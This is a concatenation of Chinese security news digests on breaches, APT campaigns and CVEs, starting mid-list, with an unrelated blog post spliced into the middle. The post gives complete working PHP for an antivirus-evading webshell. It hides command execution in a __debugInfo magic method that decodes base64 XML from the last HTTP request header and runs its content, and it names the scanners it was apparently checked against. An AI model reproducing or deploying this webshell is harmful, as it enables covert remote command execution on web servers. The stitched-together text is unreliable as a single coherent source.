DPAPI填充预言漏洞解密Cookie，16小时可破解。谷歌推出临时解决方案，微软认为利用难度高。研究揭示加密机制组合风险，建议弃用CBC模式。 8、黑客利用Vercel的v0 AI工具大规模快速创建虚假登录页面 https://thehackernews.com/2025/07/vercels-v0-ai-tool-weaponized-by.html 网络安全研究人员发现黑客利用Vercel的AI工具v0快速生成高仿钓鱼网站，降低犯罪门槛。无审查大型语言模型助长犯罪，使网络钓鱼攻击更易规模化。AI正被广泛用于构建欺诈系统，威胁日益严峻。 9、国际刑事法院ICC遭遇复杂网络攻击 https://www.securityweek.com/cyberattack-targets-international-criminal-court/ 国际刑事法院（ICC）表示，黑客再次将目标对准其系统，这距离该法院上次遭到间谍组织攻击大约已有两年时间。ICC 将上周晚些时候发生的攻击描述为“一次复杂且有针对性的网络安全事件”，但没有提供更多细节。 10、TA829黑客组织采用新型TTP与升级版RomCom后门规避检测 https://cybersecuritynews.com/ta829-hackers-employs-new-ttps/ TA829组织升级RomCom后门，采用MikroTik路由器钓鱼攻击和多阶段感染链，结合注册表持久化技术，模糊网络犯罪与间谍活动界限，展现高度适应性和隐蔽性，凸显现代网络战威胁升级趋势。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、欧洲刑警破获5.4亿美元加密货币杀猪盘 https://thehackernews.com/2025/06/europol-dismantles-540-million.html 欧洲刑警组织宣布捣毁一个跨国加密货币诈骗网络，涉案金额达约5.4亿美元。该团伙通过"杀猪盘"骗局诱骗全球超5000名受害者，利用虚假投资平台和社交工程手段敛财。西班牙警方在加那利群岛和马德里逮捕5名核心成员，爱沙尼亚、法国和美国执法机构协同参与行动。调查显示，犯罪集团通过约会软件建立信任后诱导受害者注资，使用多层账户转移赃款以逃避追踪。其洗钱网络涉及香港空壳公司、加密货币交易所及人工骡子账户。欧洲刑警组织指出，此类犯罪正借助AI技术升级话术，东南亚诈骗园 2、加拿大以国家安全为由下令海康威视停止在该国运营 https://www.anquanke.com/post/id/309186 加拿大政府官员于周五表示，“出于国家安全考量，中国视频监控设备制造商海康威视（Hikvision）必须在加拿大停止运营”。这是西方国家对部分国有的杭州海康威视数字技术有限公司生产的设备实施的一系列禁令中的最新一项。 3、时代终结：微软替换标志性“蓝屏死机”界面 https://www.anquanke.com/post/id/309218 微软将逐步停用使用数十年的蓝色“死机界面”（Blue Screen of Death, BSOD），并正式启用一种全新的黑色崩溃界面。这一变化是其“Windows 弹性计划”（Windows Resiliency Initiative，WRI）的一部分，微软明确表示：“弹性不是可选项，而是一项战略任务。” 4、关键 Sudo 漏洞可实现本地提权与主机访问绕过 https://www.anquanke.com/post/id/309228 根据 Stratascale 网络研究单位（CRU）研究员 Rich Mirch 最新发布的安全通告，Sudo 中存在两个严重漏洞：CVE-2025-32463 和 CVE-2025-32462。这些漏洞长期潜伏在这个世界上最值得信赖的提权工具中，允许攻击者绕过 sudoers 配置限制，实现本地提权至 root，即使这些用户在配置中被明确拒绝了该权限。 5、德国监管机构下令苹果、谷歌下架DeepSeek应用 https://www.anquanke.com/post/id/309238 近期，德国数据监管机构命令苹果和谷歌将中国人工智能应用DeepSeek从其在线应用商店中下架，原因是该应用未遵守欧洲的隐私和数字服务相关法规。 6、Blind Eagle通过Proton66托管服务攻击拉美金融机构 https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tracing-blind-eagle-to-proton66/ 安全机构发现Blind Eagle（APT-C-36）与俄罗斯托管服务提供商Proton66存在关联。Blind Eagle主要针对拉丁美洲组织，尤其是哥伦比亚金融机构。研究人员通过追踪Proton66相关资产，发现了依赖相同基础设施的活跃威胁集群。该集群利用VBS文件作为初始攻击向量，依赖DDNS服务，并部署RAT作为第二阶段恶意软件。研究人员发现，这些恶意软件样本与Vbs-Crypter生成的样本 7、Snake键盘记录器利用地缘政治紧张局势发动攻击 https://lab52.io/blog/snake-keylogger-in-geopolitical-affairs-abuse-of-trusted-java-utilities-in-cybercrime-operations/ 网络安全机构集团近日披露一起针对全球石油行业的攻击活动。攻击者利用经过篡改的Java调试工具jsadebugd.exe，通过伪装成哈萨克斯坦石油公司的鱼叉式钓鱼邮件传播Snake Keylogger恶意软件。研究人员指出，此次攻击正值中东局势紧张时期，可能与霍尔木兹海峡航运安全引发的全球油价波动有关，攻击者可能试图获取能源贸易敏感数据。值得注意的是，这是首 8、WordPress网站藏匿PHP后门传播Windows木马 https://blog.sucuri.net/2025/06/stealthy-wordpress-malware-drops-windows-trojan-via-php-backdoor.html 安全研究人员近日披露一起针对WordPress网站的供应链攻击。攻击者通过篡改header.php等核心文件植入后门，构建了包含IP过滤、混淆脚本下载和多阶段载荷投放的复杂攻击链。该攻击具有高度隐蔽性，采用IP轮询机制规避检测，代码混淆技术增加分析难度。安全专家建议网站管理员部署WAF并监控文件完整性，终端用户需警惕异常文件下载。目前相关IOC已提交至威胁情报平台。 9、美国警告伊朗将升级对关键基础设施网络攻击 https://thehackernews.com/2025/06/us-agencies-warn-of-rising-iranian.html 美国网络安全和基础设施安全局（CISA）、联邦调查局（FBI）、国家安全局（NSA）等机构联合发布警告，称伊朗政府支持的黑客组织正加大对美国及以色列国防、工业控制系统（OT）和关键基础设施的网络攻击。攻击者利用未修复漏洞、默认密码及自动化工具入侵目标，并可能发起DDoS、勒索软件攻击。报告指出，伊朗黑客频繁使用Shodan扫描暴露的ICS设备，结合远程访问工具（RAT）、密码破解技术横向渗透。近期APT35组织还针对以色列记者、学者发起钓鱼攻击。 10、瑞士非营利组织Radix遭勒索攻击联邦政府数据外泄 https://www.news.admin.ch/en/newnsb/T5AZeWNEPFGe 2025年6月30日，瑞士健康促进组织Radix基金会确认遭受重大勒索软件攻击，导致包括联邦政府相关部门数据在内的敏感信息被窃取并加密。攻击者已将部分数据发布于暗网进行勒索。Radix作为多家联邦机构的服务提供商，其系统存储有政府相关数据，但官方强调攻击者未直接入侵联邦政府内部系统。瑞士国家网络安全中心（NCSC）已介入调查，正协调检察机关及相关政府部门评估数据泄露影响范围。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、前北约网络安全专家表示伊朗可能发起供应链攻击 https://www.theregister.com/2025/06/28/exnato_hacker_ceasefire_iran/ 前北约网络安全专家、现任Black Kite公司CTO Candan Bolukbas近日在接受采访时强调，即使伊朗与以色列达成暂时停火协议，网络空间的对抗仍在持续。他指出：“在网络世界里，没有所谓的停火。”Bolukbas曾为北约执行反网络恐怖主义任务，最后一次任务是模拟攻击乌克兰关键电网。他通过供应链切入，仅用一个漏洞供应商，就几乎完全控制了电网系统。此经历也让他高度警惕目前伊朗针对美以基础设施的潜在攻击路径。他预计，伊朗不太可能直接攻破五角大楼或NS 2、黑客可利用蓝牙芯片漏洞进行远程窃听 https://www.bleepingcomputer.com/news/security/bluetooth-flaws-could-let-hackers-spy-through-your-microphone/ 网络安全研究人员近日披露，一种广泛用于真无线音频设备的蓝牙芯片存在严重漏洞，攻击者可借此在蓝牙范围内实施窃听、读取通话记录，甚至操控设备拨打电话。该漏洞影响了29款由10家知名厂商生产的耳机、音箱和无线麦克风设备，涉及品牌包括Bose、Sony、Jabra、JBL、Marshall、Beyerdynamic等。研究人员利用上述漏洞成功构造PoC攻击代码，能够在未经授权的情况下 3、Facebook新AI功能请求用户上传相册引发隐私担忧 https://thehackernews.com/2025/06/facebooks-new-ai-tool-requests-photo.html Meta公司近期在Facebook推出一项新AI功能，提示用户允许其上传手机相册中的照片到云端，用于生成故事拼图、回顾视频等内容建议。该功能虽然标榜“仅用户可见”、“不用于广告定向”，但业内专家和隐私倡导者普遍担心，这种做法可能进一步侵蚀用户的数据主权。据TechCrunch报道，美国和加拿大的部分用户在创建Facebook Story时，收到一则弹窗，询问是否同意“允许云处理”。Meta在弹窗中表示，系统会基于时间、地点或主题等信息持续上传 4、Cloudflare为其视频通话应用引入端到端加密技术 https://www.bleepingcomputer.com/news/security/cloudflare-open-sources-orange-meets-with-end-to-end-encryption/ Cloudflare近日宣布，为其视频通话应用Orange Meets引入端到端加密（E2EE）机制，并将该方案以开源形式发布，旨在提升通信安全性与协议透明度。虽然该应用初始作为“Cloudflare Calls”（现更名为Realtime）的一部分推出，主要面向技术演示用途，但此次的安全升级使其成为具备高加密保障的视频通话研究平台。Orange Meets基于IETF标 5、NFC正成网络犯罪新目标，恶意攻击数量半年激增35倍 https://www.freebuf.com/articles/database/437184.html 一种针对近场通信（NFC）支付系统的复杂新型恶意软件活动已演变为重大全球网络安全威胁。该攻击最初仅在东欧地区出现，如今已发展为全球性现象。ESET研究人员于2023年底首次在捷克银行客户中发现这一恶意活动，目前其已高效扩散至多个大洲。威胁呈现爆发式增长，ESET遥测数据显示，与2024年下半年相比，2025年上半年NFC相关攻击数量激增35倍。 6、Chrome紧急修复已被利用的零日漏洞CVE-2025-6554 https://www.freebuf.com/articles/web/437229.html 谷歌在发现一个已被野外利用的高危零日漏洞（CVE-2025-6554）后，紧急为其Chrome浏览器的稳定版通道发布了更新。该漏洞被归类为V8 JavaScript引擎中的类型混淆漏洞，对Windows、macOS和Linux平台的用户构成严重威胁。 7、群晖ABM漏洞泄露全局客户端密钥危及所有微软365租户 https://securityonline.info/synology-abm-flaw-cve-2025-4679-leaks-global-client-secret-exposing-all-microsoft-365-tenants/ 群晖ABM软件存在严重漏洞(CVE-2025-4679)，泄露全局客户端密钥，攻击者可无认证访问企业微软365数据，包括Teams、Outlook等。群晖低估风险，未提供充分预警。 8、挪威水坝遭网络攻击 闸门被非法开启数小时 https://hackread.com/norwegian-dam-valve-forced-open-hours-in-cyberattack/ 挪威水坝遭黑客入侵，闸门被非法开启四小时，暴露控制系统弱密码隐患。虽未造成危险，但凸显关键基础设施安全漏洞风险，警示需加强身份验证和实时监控，采用强密码等多重防护措施。 9、微软暗示将逐步撤销安全软件对Windows内核访问权限 https://www.csoonline.com/article/4014241/microsoft-hints-at-revoking-access-to-the-windows-kernel-eventually.html 微软探索用户模式下提供内核级安全功能，计划限制第三方内核访问，以提升系统可靠性。此举将要求安全厂商重构产品，但微软采取渐进策略安抚行业。内核访问矛盾在于安全与风险并存，微软最终可能完全封锁内核权限。 10、荷兰零售巨头Ahold Delhaize数据泄露事件影响超220万人 https://securityaffairs.com/179448/data-breach/ahold-delhaize-data-breach-affected-over-2-2-million-individuals.html 荷兰零售巨头Ahold Delhaize遭勒索攻击，220万人信息泄露，含社保号、银行账号等敏感数据。Inc Ransom组织宣称窃取6TB数据，因未支付赎金公开800GB。公司提供两年信用监控服务。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

前言 正当我饶有性质的开始复习 PHP 开发这个课程准备一天速通期末考试的时候，没想到有心栽花花不开，无心插柳柳成因，意外灵感突发，搞出了一个还算可以的免杀的 webshell，下面讲讲思路 起 当打开 php 复习考点的时候，发现还要考魔术方法，于是打开了好久没有翻过的 php 手册 魔术方法是一种特殊的方法，当对对象执行某些操作时会覆盖 PHP 的默认操作。 我们看了大多数魔术方法，都有自己会在某个契机出发 比如一些常规的 __construct(mixed ...$values = ""): void PHP 允许开发者在一个类中定义一个方法作为构造函数。具有构造函数的类会在每次创建新对象时先调用此方法，所以非常适合在使用对象之前做一些初始化工作。 会在实例化一个类的时候触发这个方法 __destruct(): void PHP 有析构函数的概念，这类似于其它面向对象的语言，如 C++。析构函数会在到某个对象的所有引用都被删除或者当对象被显式销毁时执行。 会在对象销毁的时候执行这个方法 于是我们可以利用这个思路来实现一个命令条件执行的方法 比如看下面的例子 <?php class a{    public function __construct()   {        system("calc");   } } new a(); 或者 <?php class a{    public function __destruct()   {        system("calc");   } } new a(); 都可以弹出计算器 所以我们可以借助这个思路 但是这两个函数还是太常见了 我们找找其他函数 承 于是开始找起来了 手册的方法都感觉太常规，而且都见过 首先需要免杀，那一定需要小众 不知道各位知不知道__debugInfo()这个魔术方法呢 下面介绍一下 __debugInfo(): array 当通过 var_dump() 转储对象，获取应该要显示的属性的时候，该函数就会被调用。如果对象中没有定义该方法，那么将会展示所有的公有、受保护和私有的属性。 下面是它的使用例子 <?php class C {    private $prop;    public function __construct($val) {        $this->prop = $val;   }    public function __debugInfo() {        return [            'propSquared' => $this->prop ** 2,       ];   } } var_dump(new C(42)); ?> 我们按着改造一下 读懂了原理后我们尝试看看能不能执行命令 <?php class C {    private $prop;    public function __construct($val) {        $this->prop = $val;   }    public function __debugInfo() {        return [            'propSquared' => $this->prop ** 2,       ];        system("calc");   } } var_dump(new C(42)); ?> 但是并没有计算器弹出来，原来忘了 php 一个最基础的语法，return 后代码就不会执行了 但是尝试了还是不行，最后问 GPT 写了个例子看看环境是不是有问题 <?php class User {    private $username;    private $password; // 敏感信息，不想输出    public function __construct($username, $password) {        $this->username = $username;        $this->password = $password;   }    public function __debugInfo() {        return [            'username' => $this->username,            'info' => '这是调试时返回的信息',            'timestamp' => time()       ];   } } $user = new User('alice', 'secret123'); var_dump($user); // 触发 __debugInfo() 输出应该是 object(User)#1 (3) { ["username"]=>  string(5) "alice" ["info"]=>  string(33) "这是调试时返回的信息" ["timestamp"]=>  int(1725092384) } 然后搜了很多，发现如果可能我们的 xdebug 配置会影响我们的这个输出，所以找了没有配置 xdebug 的 再次执行 可以看到已经有信息了 所以尝试执行命令 成功执行了命令 然后开始构造免杀 webshell 利用 SimpleXMLElement 解析 xml 文件来传入参数 终 最后搞出来的代码如下 <?php class User {    private $username;    private $password;    public function __construct($username, $password) {        $this->username = $username;        $this->password = $password;   }    public function __debugInfo() {        $xmlData = base64_decode(end(getallheaders()));        $xmlElement = new SimpleXMLElement($xmlData);        $namespaces = $xmlElement->getNamespaces(TRUE);        $xmlElement->rewind();        var_dump($xmlElement->key());        $result = $xmlElement->xpath('/books/system');        var_dump (($result[0]->__toString()));       ($xmlElement->key())($result[0]->__toString());        return [            'username' => $this->username,            'info' => '这是调试时返回的信息',            'timestamp' => time()       ];   } } $user = new User('alice', 'secret123'); var_dump($user); 这里因为我懒得搭建调试环境了，我们把 header 传入的值直接设置为 <books>    <system>calc</system> </books> 然后需要 base64 编码 <?php class User {    private $username;    private $password;    public function __construct($username, $password) {        $this->username = $username;        $this->password = $password;   }    public function __debugInfo() {        $xmlData = base64_decode("PGJvb2tzPgogICAgPHN5c3RlbT5jYWxjPC9zeXN0ZW0+CjwvYm9va3M+");        $xmlElement = new SimpleXMLElement($xmlData);        $namespaces = $xmlElement->getNamespaces(TRUE);        $xmlElement->rewind();        var_dump($xmlElement->key());        $result = $xmlElement->xpath('/books/system');        var_dump (($result[0]->__toString()));         ($xmlElement->key())($result[0]->__toString());        return [            'username' => $this->username,            'info' => '这是调试时返回的信息',            'timestamp' => time()       ];   } } $user = new User('alice', 'secret123'); var_dump($user); 成功弹出计算器 这里我为了方便直接把从 header 头传入值修改为直接写入了 首先实例化我们的 user 类 然后 var_dump($user); 在这个过程中，会触发__debugInfo 然后在这个过程中会解析 xml 数据 通过 SimpleXMLElement 的方法去截取我们需要的字符串，从而来构造一个命令执行 最后构造出我们的 webshell 长亭 微步 VIRUSTOTAL

1、朝鲜黑客组织利用35个npm软件包传播恶意软件 https://socket.dev/blog/north-korean-contagious-interview-campaign-drops-35-new-malicious-npm-packages Socket安全研究团队披露，朝鲜黑客组织“Contagious Interview”近期再度发动供应链攻击，投放35个恶意npm软件包，并利用LinkedIn冒充招聘人员诱导开发者执行多阶段恶意代码。这一行动与早前披露的“Contagious Interview”社工攻击活动相一致，目标为正在求职的开发者群体。此次攻击中，黑客通过24个npm账号上传带有HexEval加载器的恶意包，并成 2、黑客利用ClickOnce与AWS服务发起攻击行动 https://www.bleepingcomputer.com/news/security/oneclik-attacks-use-microsoft-clickonce-and-aws-to-target-energy-sector/ 安全公司Trellix近日揭露一项名为“OneClik”的复杂攻击行动，攻击者利用微软ClickOnce部署技术及亚马逊云服务，配合Golang后门“RunnerBeacon”，针对能源、石油和天然气等关键行业展开隐蔽攻击。此行动自2023年已有前兆，于2025年3月起持续活跃，具备高度隐匿性及沙箱逃避能力。攻击链始于钓鱼邮件，诱导受害者点击托管于Azur 3、黑客利用Microsoft 365的“Direct Send”功能实施钓鱼攻击 https://www.bleepingcomputer.com/news/security/microsoft-365-direct-send-abused-to-send-phishing-as-internal-users/ 安全公司Varonis发现，一场自2025年5月起发起的广泛钓鱼攻击活动正在利用Microsoft 365的“Direct Send”功能，通过仿冒公司内部邮件欺骗用户并窃取凭证。Direct Send原本是为打印机、扫描仪等设备设计的邮件发送机制，允许通过企业的SMTP智能主机发送邮件而无需身份验证。然而，这一机制的安全隐患正被攻击者利用，其发出的邮件可绕过SP 4、CISA确认攻击者正利用AMI MegaRAC漏洞进行攻击 https://securityaffairs.com/179354/security/u-s-cisa-adds-ami-megarac-spx-d-link-dir-859-routers-and-fortinet-fortios-flaws-to-its-known-exploited-vulnerabilities-catalog.html 美国网络安全与基础设施安全局（CISA）近日将三个已被广泛利用的高危漏洞新增至其“已知被利用漏洞”（KEV）目录，包括AMI MegaRAC SPx身份验证绕过漏洞（CVE-2024-54085）、D-Link DIR-859路由器路径遍历漏洞（ 5、全球数百款打印机曝出安全漏洞且无法通过固件修复 https://www.bleepingcomputer.com/news/security/brother-printer-bug-in-689-models-exposes-default-admin-passwords/ 据Rapid7研究人员披露，Brother品牌多达689款打印机存在一个严重漏洞（CVE-2024-51978），允许远程攻击者基于序列号推算出设备的默认管理员密码，从而接管打印机。更令人担忧的是，该漏洞无法通过固件更新修复，因其源于硬件制造时的密码生成逻辑。该漏洞是Rapid7历时研究Brother硬件时发现的8个漏洞之一，其密码生成算法使用设备序列号加静态“盐”值 6、Cisco网络访问控制平台存在两个远程代码执行漏洞 https://www.bleepingcomputer.com/news/security/cisco-warns-of-max-severity-rce-flaws-in-identity-services-engine/ Cisco近日发布安全公告，披露其网络访问控制平台Identity Services Engine（ISE）以及Passive Identity Connector（ISE-PIC）中存在两个严重的远程代码执行（RCE）漏洞，编号为CVE-2025-20281与CVE-2025-20282，CVSS评分均为最高的10.0。CVE-2025-20281漏洞源于公开API 7、攻击者伪造DocuSign电子邮件进行网络钓鱼 https://www.malwarebytes.com/blog/news/2025/06/fake-docusign-email-hides-tricky-phishing-attempt 近日有研究者披露了一起巧妙的仿冒DocuSign钓鱼攻击案例，该攻击通过合法渠道绕过常规安全检测，并借助Webflow网站预览功能隐藏恶意跳转行为。攻击者发送一封来自“可信联系人”的DocuSign签署通知邮件，邮件成功通过了SPF、DKIM和DMARC认证，极具迷惑性。邮件中的“查看文档”链接实际指向Webflow的预览地址，这一合法的页面初看无异常，但随后跳转至伪造的DocuSign风格界面，点击 8、APT42黑客组织针对以色列学者发起钓鱼攻击 https://securityaffairs.com/179372/apt/apt42-impersonates-cyber-professionals-to-phish-israeli-academics-and-journalists.html 以色列安全公司Check Point近日发布报告称，伊朗背景的APT42（又名Educated Manticore、Charming Kitten、Mint Sandstorm）近期针对以色列记者、网络安全专家及学术人员发起了一波精准的钓鱼攻击行动。该行动自2025年1月起持续至今，于6月中旬加剧，攻击者伪装成网络安全从业者，通过电子邮件和Wh 9、研究人员发现超过7000个MCP服务器因配置错误存在安全风险 https://www.govinfosecurity.com/misconfigured-ai-servers-weak-configurations-expose-data-systems-a-28853 安全公司Backslash Security警告称，全球已有超过7000台Model Context Protocol（MCP）服务器因配置不当而暴露在公共互联网中，给AI应用程序带来严重安全隐患。MCP协议自2023年11月才刚出现，但因其能将AI模型连接至组织内部敏感数据，部署速度惊人，目前全球部署数量已超过15000台。研究人员指出，大量MCP服务器缺乏认证控制机制，允许未经授权 10、NRS黑客攻击事件已影响超过50万名患者 https://www.govinfosecurity.com/nationwide-recovery-service-hack-grows-to-500000-victims-a-28835 2024年针对美国医疗债务催收公司Nationwide Recovery Service（NRS）的黑客攻击事件持续发酵，受影响的患者人数已超过50万。NRS最初于去年9月向美国卫生与公众服务部（HHS）报告称，事件影响仅为501人，但随着多个合作医疗机构陆续提交数据泄露报告，实际受害规模大幅攀升。近期，包括Select Medical（11.9万人）、UChicago Medicine Medica 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。